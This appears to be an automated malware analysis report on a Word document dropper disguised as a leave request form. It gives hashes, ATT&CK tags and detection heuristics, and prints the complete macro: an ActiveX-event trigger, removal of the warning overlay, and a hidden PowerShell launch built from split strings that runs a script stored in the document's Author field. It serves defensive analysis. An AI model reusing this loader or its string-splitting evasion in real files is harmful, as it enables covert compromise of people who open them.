Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2259587b948c7ed…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 2013-12-04 19:48:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07
MD5: b51cc66588efd1fd9f1a954bdd3f8815
SHA-1: d9d38b2d4a8086d15e045ec2f3d2e82cf6dded41
SHA-256: f2259587b948c7ed8c36ad8480ee5fd9cbdcaa99a25af3f11fed9838f2f2c903
Risk score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1566.001 Spearphishing Attachment

The sample is a Word document containing a VBA macro. The macro is not wired to AutoOpen or Document_Open; it fires from the Painted event of an embedded InkPicture ActiveX control (InkPicture1_Painted), with a counter guard so that Launch runs only once. Launch first deletes the shapes named "warning-div" and "Control 2" from the document, clearing the warning overlay shown to the user, then instantiates WScript.Shell via CreateObject and calls Exec on "powershell.exe -nop -windowstyle hidden -Command -". Both the ProgID and this launcher string are assembled from short concatenated string literals, so no single literal contains WScript.Shell or powershell. The PowerShell script itself is not in the macro: "-Command -" makes PowerShell read its command text from standard input, and the macro writes the document's Author built-in property (ActiveDocument.BuiltInDocumentProperties("Author")) followed by a blank line to the child's StdIn before calling Terminate on the process. That script is assessed to download and execute a second-stage payload; its text is not part of the extracted macro and is not reproduced in this report, so recovering the actual command requires reading the Author field from the document's SummaryInformation metadata. The document body presents a fake leave request form to lure the user into enabling macros.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6431535-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6431535-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
        Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
        With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
        Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
        With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the DrawingML XML namespace identifier found in ordinary Office files, not a download location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  1422 bytes
SHA-256: 4f23c5e0ec009c3b8c9584f81435a2262c51af2a4ed4e2bb97340b9c08e99676
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Once As Integer

Public Sub Launch()
    On Error Resume Next
    DeleteWarningShape "warning-div", False
    DeleteWarningShape "Control 2", False
    
    Dim authorProperty As String
    authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
    Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
    With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
        .StdIn.WriteLine authorProperty
        .StdIn.WriteBlankLine 1
        .Terminate
    End With
End Sub

Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
    Dim shape As Word.shape
    On Error Resume Next
    For Each shape In ActiveDocument.Shapes
        If StrComp(shape.Name, textBoxName) = 0 Then
            shape.Delete
            Exit For
        End If
    Next
    If saveDocAfter Then
        ActiveDocument.Save
    End If
End Sub

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    If Once < 1 Then
        Launch
    End If
    Once = Once + 1
End Sub